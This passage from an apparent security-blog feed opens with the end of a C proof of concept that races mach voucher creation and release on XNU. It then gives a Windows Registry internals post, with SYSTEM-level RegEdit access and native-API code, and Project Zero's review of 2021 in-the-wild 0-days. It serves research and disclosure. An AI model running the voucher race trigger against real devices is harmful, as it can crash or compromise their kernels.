    struct recipe_template_meta* template = (struct recipe_template_meta*)arg;

    for (int i = 0; i < iter_limit; i++) {

        mach_port_t voucher_port = create_voucher_from_recipe(template->recipe, template->recipe_size);

        mach_port_deallocate(mach_task_self(), voucher_port);

    }

    return NULL;

}

void sploit_3() {

    while(1) {

        // choose a userdata size:

        uint32_t userdata_size = (arc4random() % 2040)+8;

        userdata_size += 7;

        userdata_size &= (~7);

        printf("userdata size: 0x%x\n", userdata_size);

        uint8_t* userdata_buffer = calloc(userdata_size, 1);

        ((uint32_t*)userdata_buffer)[0] = arc4random();

        ((uint32_t*)userdata_buffer)[1] = arc4random();

        // build the templates:

        single_recipe_template.recipe = create_single_variable_userdata_voucher_recipe(userdata_buffer, userdata_size, &single_recipe_template.recipe_size);

        redeem_recipe_template.recipe = create_single_variable_userdata_then_redeem_voucher_recipe(userdata_buffer, userdata_size, &redeem_recipe_template.recipe_size);

        free(userdata_buffer);

        pthread_t single_recipe_thread;

        pthread_create(&single_recipe_thread, NULL, s3threadfunc, (void*)&single_recipe_template);

        pthread_t redeem_recipe_thread;

        pthread_create(&redeem_recipe_thread, NULL, s3threadfunc, (void*)&redeem_recipe_template);

        pthread_join(single_recipe_thread, NULL);

        pthread_join(redeem_recipe_thread, NULL);

        free(single_recipe_template.recipe);

        free(redeem_recipe_template.recipe);

    }

}

int main(int argc, char** argv) {

    sploit_3();

}

Mysteries of the Registry

15 April 2022 at 15:17

The Windows Registry is one of the most recognized aspects of Windows. It’s a hierarchical database, storing information on a machine-wide basis and on a per-user basis… mostly. In this post, I’d like to examine the major parts of the Registry, including the “real” Registry.

Looking at the Registry is typically done by launching the built-in RegEdit.exe tool, which shows the five “hives” that seem to comprise the Registry:

RegEdit showing the main hives

These so-called “hives” provide some abstracted view of the information in the Registry. I’m saying “abstracted”, because not all of these are true hives. A true hive is stored in a file. The full hive list can be found in the Registry itself – at HKLM\SYSTEM\CurrentControlSet\Control\hivelist (I’ll abbreviate HKEY_LOCAL_MACHINE as HKLM), mapping an internal key name to the file where it’s stored (more on these “internal” key names will be discussed soon):

The hive list

Let’s examine the so-called “hives” as seen in the root RegEdit’s view.

  • HKEY_LOCAL_MACHINE is the simplest to understand. It contains machine-wide information, most of it stored in files (persistent). Some hardware-related information is built when the system initializes and is only kept in memory while the system is running. Such keys are volatile, since their contents disappear when the system is shut down.
    There are many interesting keys within HKLM, but my goal is not to go over every key (that would take a full book), but to highlight a few useful pieces. HKLM\System\CurrentControlSet\Services is the key where all services and device drivers are installed. Note that “CurrentControlSet” is not a true key, but in fact a link key, connecting it to something like HKLM\System\ControlSet001. The reason for this indirection is beyond the scope of this post. Regedit does not show this fact directly – there is no way to tell whether a key is a true key or just points to a different key. This is one reason I created Total Registry (formerly called Registry Explorer), which shows these kinds of nuances:
TotalRegistry showing HKLM\System\CurrentControlSet

The linked key seems to have a weird name starting with \REGISTRY\MACHINE\. We’ll get to that shortly.

Other subkeys of note under HKLM include SOFTWARE, where installed applications store their system-level information; SAM and SECURITY, where local security policy and local account information are managed. The contents of these two subkeys are not visible – even administrators don’t get access – only the SYSTEM account is granted access. One way to see what’s in these keys is to use psexec from Sysinternals to launch RegEdit or TotalRegistry under the SYSTEM account. Here is a command you can run in an elevated command window that will launch RegEdit under the SYSTEM account (if you’re using RegEdit, close it first):

psexec -s -i -d RegEdit

The -s switch indicates the SYSTEM account. -i is critical, as it runs the process in the interactive session (the default would run it in session 0, where no interactive user will ever see it). The -d switch is optional, and simply returns control to the console while the process is running, rather than waiting for the process to terminate.

The other way to gain access to the SAM and SECURITY subkeys is to use the “Take Ownership” privilege (easy to do when the Permissions dialog is open), and transfer the ownership to an admin user – the owner can specify who can do what with an object, and allow itself full access. Obviously, this is not a good idea in general, as it weakens security.

The BCD00000000 subkey contains the Boot Configuration Data (BCD), normally accessed using the bcdedit.exe tool.

  • HKEY_USERS – this is the other hive that truly stores data. Its subkeys contain user profiles for all users that ever logged in locally to this machine. Each subkey’s name is a Security ID (SID), in its string representation:
HKEY_USERS

There are 3 well-known SIDs, representing the SYSTEM (S-1-5-18), LocalService (S-1-5-19), and NetworkService (S-1-5-20) accounts. These are the typical accounts used for running Windows Services. “Normal” users get ugly SIDs, such as the one shown – that’s my user’s local SID. You may be wondering what is that “_Classes” suffix in the second key. We’ll get to that as well.

  • HKEY_CURRENT_USER is a link key, pointing to the subkey under HKEY_USERS of the user running the current process. Obviously, the meaning of “current user” changes based on the access token of the process looking at the Registry.
  • HKEY_CLASSES_ROOT is the most curious of the keys. It’s not a “real” key in the sense that it’s not a hive – not stored in a file. It’s not a link key, either. This key is a “combination” of two keys: HKLM\Software\Classes and HKCU\Software\Classes. In other words, the information in HKEY_CLASSES_ROOT is coming from the machine hive first, but can be overridden by the current user’s hive.
    What information is there anyway? The first thing is shell-related information, such as file extensions and associations, and all other information normally used by Explorer.exe. The second thing is information related to the Component Object Model (COM). For example, the CLSID subkey holds COM class registration (GUIDs you can pass to CoCreateInstance to (potentially) create a COM object of that class). Looking at the CLSID subkey under HKLM\Software\Classes shows there are 8160 subkeys, or roughly 8160 COM classes registered on my system from HKLM:
HKLM\Software\Classes

Looking at the same key under HKEY_CURRENT_USER tells a different story:

HKCU\Software\Classes

Only 46 COM classes provide extra or overridden registrations. HKEY_CLASSES_ROOT combines both, and uses HKCU in case of a conflict (same key name). This explains the extra “_Classes” subkey within the HKEY_USERS key – it stores the per user stuff (in the file UsrClasses.dat in something like c:\Users\<username>\AppData\Local\Microsoft\Windows).

  • HKEY_CURRENT_CONFIG is a link to HKLM\SYSTEM\CurrentControlSet\Hardware\Profiles\Current

    The list of “standard” hives (the hives accessible by official Windows APIs such as RegOpenKeyEx) contains some more that are not shown by Regedit. They can be viewed by TotalReg if the option “Extra Hives” is selected in the View menu. At this time, however, the tool needs to be restarted for this change to take effect (I just didn’t get around to implementing the change dynamically, as it was low on my priority list). Here are all the hives accessible with the official Windows API:
All hives

I’ll let the interested reader dig further into these “extra” hives. One of these hives deserves special mention – HKEY_PERFORMANCE_DATA – it was used in the pre-Windows 2000 days as a way to access Performance Counters. Registry APIs had to be used at the time. Fortunately, starting from Windows 2000, a new dedicated API is provided to access Performance Counters (functions starting with Pdh* in <pdh.h>).
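
To give a flavor of the newer API, here is a minimal sketch (error handling omitted) that samples the total processor time counter twice and prints the formatted value; the counter path and the one-second interval are arbitrary choices for the example:

#include <windows.h>
#include <pdh.h>
#include <stdio.h>

#pragma comment(lib, "pdh.lib")

int main(void) {
    PDH_HQUERY query;
    PDH_HCOUNTER counter;
    PDH_FMT_COUNTERVALUE value;

    PdhOpenQuery(NULL, 0, &query);
    PdhAddEnglishCounterW(query, L"\\Processor(_Total)\\% Processor Time", 0, &counter);
    // Rate counters need two samples; the first collection just primes the counter.
    PdhCollectQueryData(query);
    Sleep(1000);
    PdhCollectQueryData(query);
    PdhGetFormattedCounterValue(counter, PDH_FMT_DOUBLE, NULL, &value);
    printf("CPU: %.1f%%\n", value.doubleValue);

    PdhCloseQuery(query);
    return 0;
}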

Is this it? Is this the entire Registry? Not quite. As you can see in TotalReg, there is a node called “Registry”, that tells yet another story. Internally, all Registry keys are rooted in a single key called REGISTRY. This is the only named Registry key. You can see it in the root of the Object Manager’s namespace with WinObj from Sysinternals:

WinObj from Sysinternals showing the Registry key object

Here is the object details in a Local Kernel debugger:

lkd> !object \registry
Object: ffffe00c8564c860  Type: (ffff898a519922a0) Key
    ObjectHeader: ffffe00c8564c830 (new version)
    HandleCount: 1  PointerCount: 32770
    Directory Object: 00000000  Name: \REGISTRY
lkd> !trueref ffffe00c8564c860
ffffe00c8564c860: HandleCount: 1 PointerCount: 32770 RealPointerCount: 3

All other Registry keys are based off that root key; the Configuration Manager (the kernel component in charge of the Registry) parses the remaining path as expected. This is the real Registry. The official Windows APIs cannot use this path format, but native APIs can. For example, using NtOpenKey (documented as ZwOpenKey in the Windows Driver Kit, as this is a system call) allows such access. This is how TotalReg is able to look at the real Registry.
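
For example, a minimal user-mode sketch of opening a key by its real path might look like the following. NtOpenKey is not declared in the SDK headers, so the prototype is declared by hand and resolved from ntdll at runtime; the target path here is just an arbitrary example, and this is an illustration of the native path format rather than how TotalReg is implemented:

#include <windows.h>
#include <winternl.h>
#include <wchar.h>
#include <stdio.h>

#ifndef OBJ_CASE_INSENSITIVE
#define OBJ_CASE_INSENSITIVE 0x00000040L
#endif

// NtOpenKey is exported by ntdll.dll but not declared in the SDK headers,
// so declare the prototype manually and resolve it at runtime.
typedef NTSTATUS (NTAPI *NtOpenKey_t)(PHANDLE KeyHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes);

int main(void) {
    NtOpenKey_t pNtOpenKey = (NtOpenKey_t)GetProcAddress(
        GetModuleHandleW(L"ntdll.dll"), "NtOpenKey");

    // A "real" Registry path - \REGISTRY\MACHINE rather than HKEY_LOCAL_MACHINE
    UNICODE_STRING path;
    path.Buffer = (PWSTR)L"\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion";
    path.Length = (USHORT)(wcslen(path.Buffer) * sizeof(WCHAR));
    path.MaximumLength = path.Length + sizeof(WCHAR);

    OBJECT_ATTRIBUTES attr;
    InitializeObjectAttributes(&attr, &path, OBJ_CASE_INSENSITIVE, NULL, NULL);

    HANDLE hKey = NULL;
    NTSTATUS status = pNtOpenKey(&hKey, KEY_READ, &attr);
    printf("NtOpenKey returned 0x%08X\n", (unsigned int)status);
    if (hKey) {
        CloseHandle(hKey);   // key handles are regular kernel handles
    }
    return 0;
}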

Clearly, the normal user-mode APIs somehow map the “standard” hive path to the real Registry path. The simplest is the mapping of HKEY_LOCAL_MACHINE to \REGISTRY\MACHINE. Another simple one is HKEY_USERS mapped to \REGISTRY\USER. HKEY_CURRENT_USER is a bit more complex, and needs to be mapped to the per-user hive under \REGISTRY\USER. The most complex is our friend HKEY_CLASSES_ROOT – there is no simple mapping – the APIs have to check whether there is a per-user override or not, etc.

Lastly, it seems there are keys in the real Registry that cannot be reached from the standard Registry at all:

The real Registry

There is a key named “A” which seems inaccessible. This key is used for private keys in processes, very common in Universal Windows Application (UWP) processes, but can be used in other processes as well. They are not accessible generally, not even with kernel code – the Configuration Manager prevents it. You can verify their existence by searching for \Registry\A in tools like Process Explorer or TotalReg itself (by choosing Scan Key Handles from the Tools menu). Here is TotalReg, followed by Process Explorer:

TotalReg key handles
Process Explorer key handles

Finally, the WC key is used for Windows Containers, internally called Silos. A container (like the ones created by Docker) is an isolated instance of a user-mode OS, kind of like a lightweight virtual machine, except that the kernel is not separate (as it would be with a true VM) but is provided by the host. Silos are very interesting, but outside the scope of this post.

Briefly, there are two main Silo types: an Application Silo, which is not a true container, and is mostly used with applications based on the Desktop Bridge technology. A classic example is WinDbg Preview. The second type is a Server Silo, which is a true container. A true container must have its file system, Registry, and Object Manager namespace virtualized. This is exactly the role of the WC subkeys – to provide the private Registry keys for containers. The Configuration Manager (as well as other parts of the kernel) is Silo-aware, and will redirect Registry calls to the correct subkey, having no effect on the Host Registry or the private Registry of other Silos.

You can examine some aspects of silos with the kernel debugger !silo command. Here is an example from a server 2022 running a Server Silo and the Registry keys under WC:

lkd> !silo
		Address          Type       ProcessCount Identifier
		ffff800f2986c2e0 ServerSilo 15           {1d29488c-bccd-11ec-a503-d127529101e4} (0n732)
1 active Silo(s)
lkd> !silo ffff800f2986c2e0

Silo ffff800f2986c2e0:
		Job               : ffff800f2986c2e0
		Type              : ServerSilo
		Identifier        : {1d29488c-bccd-11ec-a503-d127529101e4} (0n732)
		Processes         : 15

Server silo globals ffff800f27e65a40:
		Default Error Port: ffff800f234ee080
		ServiceSessionId  : 217
		Root Directory    : 00007ffcad26b3e1 '\Silos\732'
		State             : Running
A Server Silo’s keys

There you have it. The relatively simple-looking Registry shown in RegEdit is viewed differently by the kernel. Device driver writers find this out relatively early – they cannot use the “abstractions” provided by user mode even if these are sometimes convenient.


image-1

zodiacon

The More You Know, The More You Know You Don’t Know

By: Anonymous
19 April 2022 at 16:06

A Year in Review of 0-days Used In-the-Wild in 2021

Posted by Maddie Stone, Google Project Zero

This is our third annual year in review of 0-days exploited in-the-wild [2020, 2019]. Each year we’ve looked back at all of the detected and disclosed in-the-wild 0-days as a group and synthesized what we think the trends and takeaways are. The goal of this report is not to detail each individual exploit, but instead to analyze the exploits from the year as a group, looking for trends, gaps, lessons learned, successes, etc. If you’re interested in the analysis of individual exploits, please check out our root cause analysis repository.

We perform and share this analysis in order to make 0-day hard. We want it to be more costly, more resource intensive, and overall more difficult for attackers to use 0-day capabilities. 2021 highlighted just how important it is to stay relentless in our pursuit to make it harder for attackers to exploit users with 0-days. We heard over and over and over about how governments were targeting journalists, minoritized populations, politicians, human rights defenders, and even security researchers around the world. The decisions we make in the security and tech communities can have real impacts on society and our fellow humans’ lives.

We’ll provide our evidence and process for our conclusions in the body of this post, and then wrap it all up with our thoughts on next steps and hopes for 2022 in the conclusion. If digging into the bits and bytes is not your thing, then feel free to just check-out the Executive Summary and Conclusion.

Executive Summary

2021 included the detection and disclosure of 58 in-the-wild 0-days, the most ever recorded since Project Zero began tracking in mid-2014. That’s more than double the previous maximum of 28 detected in 2015 and especially stark when you consider that there were only 25 detected in 2020. We’ve tracked publicly known in-the-wild 0-day exploits in this spreadsheet since mid-2014.

While we often talk about the number of 0-day exploits used in-the-wild, what we’re actually discussing is the number of 0-day exploits detected and disclosed as in-the-wild. And that leads into our first conclusion: we believe the large uptick in in-the-wild 0-days in 2021 is due to increased detection and disclosure of these 0-days, rather than simply increased usage of 0-day exploits.

With this record number of in-the-wild 0-days to analyze we saw that attacker methodology hasn’t actually had to change much from previous years. Attackers are having success using the same bug patterns and exploitation techniques and going after the same attack surfaces. Project Zero’s mission is “make 0day hard”. 0-day will be harder when, overall, attackers are not able to use public methods and techniques for developing their 0-day exploits. When we look over these 58 0-days used in 2021, what we see instead are 0-days that are similar to previous & publicly known vulnerabilities. Only two 0-days stood out as novel: one for the technical sophistication of its exploit and the other for its use of logic bugs to escape the sandbox.

So while we recognize the industry’s improvement in the detection and disclosure of in-the-wild 0-days, we also acknowledge that there’s a lot more improving to be done. Having access to more “ground truth” of how attackers are actually using 0-days shows us that they are able to have success by using previously known techniques and methods rather than having to invest in developing novel techniques. This is a clear area of opportunity for the tech industry.

We had so many more data points in 2021 to learn about attacker behavior than we’ve had in the past. Having all this data, though, has left us with even more questions than we had before. Unfortunately, attackers who actively use 0-day exploits do not share the 0-days they’re using or what percentage of 0-days we’re missing in our tracking, so we’ll never know exactly what proportion of 0-days are currently being found and disclosed publicly.

Based on our analysis of the 2021 0-days we hope to see the following progress in 2022 in order to continue taking steps towards making 0-day hard:

  1. All vendors agree to disclose the in-the-wild exploitation status of vulnerabilities in their security bulletins.
  2. Exploit samples or detailed technical descriptions of the exploits are shared more widely.
  3. Continued concerted efforts on reducing memory corruption vulnerabilities or rendering them unexploitable. Launch mitigations that will significantly impact the exploitability of memory corruption vulnerabilities.

A Record Year for In-the-Wild 0-days

2021 was a record year for in-the-wild 0-days. So what happened?

bar graph showing the number of in-the-wild 0-days detected per year from 2015-2021. The totals are taken from this tracking spreadsheet: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=2129022708

Is it that software security is getting worse? Or is it that attackers are using 0-day exploits more? Or has our ability to detect and disclose 0-days increased? When looking at the significant uptick from 2020 to 2021, we think it's mostly explained by the latter. While we believe there has been a steady growth in interest and investment in 0-day exploits by attackers in the past several years, and that security still needs to urgently improve, it appears that the security industry's ability to detect and disclose in-the-wild 0-day exploits is the primary explanation for the increase in observed 0-day exploits in 2021.

While we often talk about “0-day exploits used in-the-wild”, what we’re actually tracking are “0-day exploits detected and disclosed as used in-the-wild”. There are more factors than just the use that contribute to an increase in that number, most notably: detection and disclosure. Better detection of 0-day exploits and more transparently disclosed exploited 0-day vulnerabilities is a positive indicator for security and progress in the industry.

Overall, we can break down the uptick in the number of in-the-wild 0-days into:

  • More detection of in-the-wild 0-day exploits
  • More public disclosure of in-the-wild 0-day exploitation

More detection

In the 2019 Year in Review, we wrote about the “Detection Deficit”. We stated “As a community, our ability to detect 0-days being used in the wild is severely lacking to the point that we can’t draw significant conclusions due to the lack of (and biases in) the data we have collected.” In the last two years, we believe that there’s been progress on this gap.

Anecdotally, we hear from more people that they’ve begun working more on detection of 0-day exploits. Quantitatively, while a very rough measure, we’re also seeing the number of entities credited with reporting in-the-wild 0-days increasing. It stands to reason that if the number of people working on trying to find 0-day exploits increases, then the number of in-the-wild 0-day exploits detected may increase.

A bar graph showing the number of distinct reporters of 0-day in-the-wild vulnerabilities per year for 2019-2021. 2019: 9, 2020: 10, 2021: 20. The data is taken from: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=2129022708

a line graph showing how many in-the-wild 0-days were found by their own vendor per year from 2015 to 2021. 2015: 0, 2016: 0, 2017: 2, 2018: 0, 2019: 4, 2020: 5, 2021: 17. Data comes from: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=2129022708

We’ve also seen the number of vendors detecting in-the-wild 0-days in their own products increasing. Whether or not these vendors were previously working on detection, vendors seem to have found ways to be more successful in 2021. Vendors likely have the most telemetry and overall knowledge and visibility into their products so it’s important that they are investing in (and hopefully having success in) detecting 0-days targeting their own products. As shown in the chart above, there was a significant increase in the number of in-the-wild 0-days discovered by vendors in their own products. Google discovered 7 of the in-the-wild 0-days in their own products and Microsoft discovered 10 in their products!

More disclosure

The second reason why the number of detected in-the-wild 0-days has increased is due to more disclosure of these vulnerabilities. Apple and Google Android (we differentiate “Google Android” rather than just “Google” because Google Chrome has been annotating their security bulletins for the last few years) first began labeling vulnerabilities in their security advisories with the information about potential in-the-wild exploitation in November 2020 and January 2021 respectively. When vendors don’t annotate their release notes, the only way we know that a 0-day was exploited in-the-wild is if the researcher who discovered the exploitation comes forward. If Apple and Google Android had not begun annotating their release notes, the public would likely not know about at least 7 of the Apple in-the-wild 0-days and 5 of the Android in-the-wild 0-days. Why? Because these vulnerabilities were reported by “Anonymous” reporters. If the reporters didn’t want credit for the vulnerability, it’s unlikely that they would have gone public to say that there were indications of exploitation. That is 12 0-days that wouldn’t have been included in this year’s list if Apple and Google Android had not begun transparently annotating their security advisories.

bar graph that shows the number of Android and Apple (WebKit + iOS + macOS) in-the-wild 0-days per year. The bar graph is split into two colors: yellow for anonymously reported 0-days and green for non-anonymously reported 0-days. 2021 is the only year with any anonymously reported 0-days. 2015: 0, 2016: 3, 2018: 2, 2019: 1, 2020: 3, 2021: Non-Anonymous: 8, Anonymous: 12. Data from: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=2129022708

Kudos and thank you to Microsoft, Google Chrome, and Adobe who have been annotating their security bulletins for transparency for multiple years now! And thanks to Apache who also annotated their release notes for CVE-2021-41773 this past year.

In-the-wild 0-days in Qualcomm and ARM products were annotated as in-the-wild in Android security bulletins, but not in the vendors’ own security advisories.

It's highly likely that in 2021, there were other 0-days that were exploited in the wild and detected, but vendors did not mention this in their release notes. In 2022, we hope that more vendors start noting when they patch vulnerabilities that have been exploited in-the-wild. Until we’re confident that all vendors are transparently disclosing in-the-wild status, there’s a big question of how many in-the-wild 0-days are discovered, but not labeled publicly by vendors.

New Year, Old Techniques

We had a record number of “data points” in 2021 to understand how attackers are actually using 0-day exploits. A bit surprising to us though, there was nothing new amongst all this data. 0-day exploits are considered one of the most advanced attack methods an actor can use, so it would be easy to conclude that attackers must be using special tricks and attack surfaces. But instead, the 0-days we saw in 2021 generally followed the same bug patterns, attack surfaces, and exploit “shapes” previously seen in public research. Once 0-day exploitation is genuinely hard, we’d expect that, to be successful, attackers would have to find new bug classes of vulnerabilities in new attack surfaces using never-before-seen exploitation methods. In general, that wasn't what the data showed us this year. With two exceptions out of the 58 (described below in the iOS section), everything we saw was pretty “meh” or standard.

Out of the 58 in-the-wild 0-days for the year, 39, or 67% were memory corruption vulnerabilities. Memory corruption vulnerabilities have been the standard for attacking software for the last few decades and it’s still how attackers are having success. Out of these memory corruption vulnerabilities, the majority also stuck with very popular and well-known bug classes:

  • 17 use-after-free
  • 6 out-of-bounds read & write
  • 4 buffer overflow
  • 4 integer overflow

In the next sections we’ll dive into each major platform that we saw in-the-wild 0-days for this year. We’ll share the trends and explain why what we saw was pretty unexceptional.

Chromium (Chrome)

Chromium had a record high number of 0-days detected and disclosed in 2021 with 14. Out of these 14, 10 were renderer remote code execution bugs, 2 were sandbox escapes, 1 was an infoleak, and 1 was used to open a webpage in Android apps other than Google Chrome.

The 14 0-day vulnerabilities were in the following components:

When we look at the components targeted by these bugs, they’re all attack surfaces seen before in public security research and previous exploits. If anything, there are a few fewer DOM bugs and more bugs targeting other browser components such as IndexedDB and WebGL than previously. 13 out of the 14 Chromium 0-days were memory corruption bugs. Similar to last year, most of those memory corruption bugs are use-after-free vulnerabilities.

A couple of the Chromium bugs were even similar to previous in-the-wild 0-days. CVE-2021-21166 is an issue in ScriptProcessorNode::Process() in webaudio where there’s insufficient locking such that buffers are accessible in both the main thread and the audio rendering thread at the same time. CVE-2019-13720 is an in-the-wild 0-day from 2019. It was a vulnerability in ConvolverHandler::Process() in webaudio where there was also insufficient locking such that a buffer was accessible in both the main thread and the audio rendering thread at the same time.

CVE-2021-30632 is another Chromium in-the-wild 0-day from 2021. It’s a type confusion in the TurboFan JIT in Chromium’s JavaScript Engine, v8, where TurboFan fails to deoptimize code after a property map is changed. CVE-2021-30632 in particular deals with code that stores global properties. CVE-2020-16009 was also an in-the-wild 0-day that was due to TurboFan failing to deoptimize code after map deprecation.

WebKit (Safari)

Prior to 2021, Apple had only acknowledged 1 publicly known in-the-wild 0-day targeting WebKit/Safari, and that was due to sharing by an external researcher. In 2021 there were 7. This makes it hard for us to assess trends or changes since we don’t have historical samples to go off of. Instead, we’ll look at 2021’s WebKit bugs in the context of other Safari bugs not known to be in-the-wild and other browser in-the-wild 0-days.

The 7 in-the-wild 0-days targeted the following components:

The one semi-surprise is that no DOM bugs were detected and disclosed. In previous years, vulnerabilities in the DOM engine have generally made up 15-20% of the in-the-wild browser 0-days, but none were detected and disclosed for WebKit in 2021.

It would not be surprising if attackers are beginning to shift to other modules, like third party libraries or things like IndexedDB. The modules may be more promising to attackers going forward because there’s a better chance that the vulnerability may exist in multiple browsers or platforms. For example, the webaudio bug in Chromium, CVE-2021-21166, also existed in WebKit and was fixed as CVE-2021-1844, though there was no evidence it was exploited in-the-wild in WebKit. The IndexedDB in-the-wild 0-day that was used against Safari in 2021, CVE-2021-30858, was very, very similar to a bug fixed in Chromium in January 2020.

Internet Explorer

Since we began tracking in-the-wild 0-days, Internet Explorer has had a pretty consistent number of 0-days each year. 2021 actually tied 2016 for the most in-the-wild Internet Explorer 0-days we’ve ever tracked even though Internet Explorer’s market share of web browser users continues to decrease.

Bar graph showing the number of Internet Explorer itw 0-days discovered per year from 2015-2021. 2015: 3, 2016: 4, 2017: 3, 2018: 1, 2019: 3, 2020: 2, 2021: 4. Data from: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=2129022708

So why are we seeing so little change in the number of in-the-wild 0-days despite the change in market share? Internet Explorer is still a ripe attack surface for initial entry into Windows machines, even if the user doesn’t use Internet Explorer as their Internet browser. While the number of 0-days stayed pretty consistent to what we’ve seen in previous years, the components targeted and the delivery methods of the exploits changed. 3 of the 4 0-days seen in 2021 targeted the MSHTML browser engine and were delivered via methods other than the web. Instead they were delivered to targets via Office documents or other file formats.

The four 0-days targeted the following components:

For CVE-2021-26411, targets of the campaign initially received a .mht file, which prompted the user to open it in Internet Explorer. Once it was opened in Internet Explorer, the exploit was downloaded and run. CVE-2021-33742 and CVE-2021-40444 were delivered to targets via malicious Office documents.

CVE-2021-26411 and CVE-2021-33742 followed two common memory corruption bug patterns: a use-after-free, where a user-controlled callback fires in between two actions that use an object and the user frees the object during that callback, and a buffer overflow.

The exploit chain built around CVE-2021-40444 used a few different vulnerabilities, but the MSHTML one meant that as soon as the Office document was opened the payload would run: a CAB file was downloaded, decompressed, and then a function from within a DLL in that CAB was executed. Unlike the previous two MSHTML bugs, this was a logic error in URL parsing rather than a memory corruption bug.

Windows

Windows is the platform where we’ve seen the most change in components targeted compared with previous years. However, this shift has generally been in progress for a few years and was predicted as Windows 7 reached end-of-life in 2020, which is why it’s still not especially novel.

In 2021 there were 10 Windows in-the-wild 0-days targeting 7 different components:

The number of different components targeted is the shift from past years. For example, in 2019 75% of Windows 0-days targeted Win32k while in 2021 Win32k only made up 20% of the Windows 0-days. The reason that this was expected and predicted was that 6 out of 8 of those 0-days that targeted Win32k in 2019 did not target the latest release of Windows 10 at that time; they were targeting older versions. With Windows 10 Microsoft began dedicating more and more resources to locking down the attack surface of Win32k so as those older versions have hit end-of-life, Win32k is a less and less attractive attack surface.

Similar to the many Win32k vulnerabilities seen over the years, the two 2021 Win32k in-the-wild 0-days are due to custom user callbacks. The user calls functions that change the state of an object during the callback and Win32k does not correctly handle those changes. CVE-2021-1732 is a type confusion vulnerability due to a user callback in xxxClientAllocWindowClassExtraBytes which leads to out-of-bounds read and write. If NtUserConsoleControl is called during the callback a flag is set in the window structure to signal that a field is an offset into the kernel heap. xxxClientAllocWindowClassExtraBytes doesn’t check this and writes that field as a user-mode pointer without clearing the flag. The first in-the-wild 0-day detected and disclosed in 2022, CVE-2022-21882, is due to CVE-2021-1732 actually not being fixed completely. The attackers found a way to bypass the original patch and still trigger the vulnerability. CVE-2021-40449 is a use-after-free in NtGdiResetDC due to the object being freed during the user callback.

iOS/macOS

As discussed in the “More disclosure” section above, 2021 was the first full year that Apple annotated their release notes with in-the-wild status of vulnerabilities. 5 iOS in-the-wild 0-days were detected and disclosed this year. The first publicly known macOS in-the-wild 0-day (CVE-2021-30869) was also found. In this section we’re going to discuss iOS and macOS together because: 1) the two operating systems include similar components and 2) the sample size for macOS is very small (just this one vulnerability).

Bar graph showing the number of macOS and iOS itw 0-days discovered per year. macOS is 0 for every year except 2021 when 1 was discovered. iOS - 2015: 0, 2016: 2, 2017: 0, 2018: 2, 2019: 0, 2020: 3, 2021: 5. Data from: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=2129022708

For the 5 total iOS and macOS in-the-wild 0-days, they targeted 3 different attack surfaces:

These attack surfaces are not novel. IOMobileFrameBuffer has been a target of public security research for many years. For example, the Pangu Jailbreak from 2016 used CVE-2016-4654, a heap buffer overflow in IOMobileFrameBuffer. IOMobileFrameBuffer manages the screen’s frame buffer. For iPhone 11 (A13) and below, IOMobileFrameBuffer was a kernel driver. Beginning with A14, it runs on a coprocessor, the DCP. It’s a popular attack surface because historically it’s been accessible from sandboxed apps. In 2021 there were two in-the-wild 0-days in IOMobileFrameBuffer. CVE-2021-30807 is an out-of-bounds read and CVE-2021-30883 is an integer overflow, both common memory corruption vulnerabilities. In 2022, we already have another in-the-wild 0-day in IOMobileFrameBuffer, CVE-2022-22587.

One iOS 0-day and the macOS 0-day both exploited vulnerabilities in the XNU kernel and both vulnerabilities were in code related to XNU’s inter-process communication (IPC) functionality. CVE-2021-1782 exploited a vulnerability in mach vouchers while CVE-2021-30869 exploited a vulnerability in mach messages. This is not the first time we’ve seen iOS in-the-wild 0-days, much less public security research, targeting mach vouchers and mach messages. CVE-2019-6625 was exploited as a part of an exploit chain targeting iOS 11.4.1-12.1.2 and was also a vulnerability in mach vouchers.

Mach messages have also been a popular target for public security research. In 2020 there were two in-the-wild 0-days also in mach messages: CVE-2020-27932 & CVE-2020-27950. This year’s CVE-2021-30869 is a pretty close variant to 2020’s CVE-2020-27932. Tielei Wang and Xinru Chi actually presented on this vulnerability at Zer0Con 2021 in April 2021. In their presentation, they explained that they found it while doing variant analysis on CVE-2020-27932. Tielei Wang explained via Twitter that they had found the vulnerability in December 2020 and had noticed it was fixed in beta versions of iOS 14.4 and macOS 11.2 which is why they presented it at Zer0Con. The in-the-wild exploit only targeted macOS 10, but used the same exploitation technique as the one presented.

The two FORCEDENTRY exploits (CVE-2021-30860 and the sandbox escape) were the only times that made us all go “wow!” this year. For CVE-2021-30860, the integer overflow in CoreGraphics, it was because:

  1. For years we’ve all heard about how attackers are using 0-click iMessage bugs and finally we have a public example, and
  2. The exploit was an impressive work of art.

The sandbox escape (CVE requested, not yet assigned) was impressive because it’s one of the few times we’ve seen a sandbox escape in-the-wild that uses only logic bugs, rather than the standard memory corruption bugs.

For CVE-2021-30860, the vulnerability itself wasn’t especially notable: a classic integer overflow within the JBIG2 parser of the CoreGraphics PDF decoder. The exploit, though, was described by Samuel Groß & Ian Beer as “one of the most technically sophisticated exploits [they]’ve ever seen”. Their blogpost shares all the details, but the highlight is that the exploit uses the logical operators available in JBIG2 to build NAND gates which are used to build its own computer architecture. The exploit then writes the rest of its exploit using that new custom architecture. From their blogpost:

        

Using over 70,000 segment commands defining logical bit operations, they define a small computer architecture with features such as registers and a full 64-bit adder and comparator which they use to search memory and perform arithmetic operations. It's not as fast as Javascript, but it's fundamentally computationally equivalent.

The bootstrapping operations for the sandbox escape exploit are written to run on this logic circuit and the whole thing runs in this weird, emulated environment created out of a single decompression pass through a JBIG2 stream. It's pretty incredible, and at the same time, pretty terrifying.
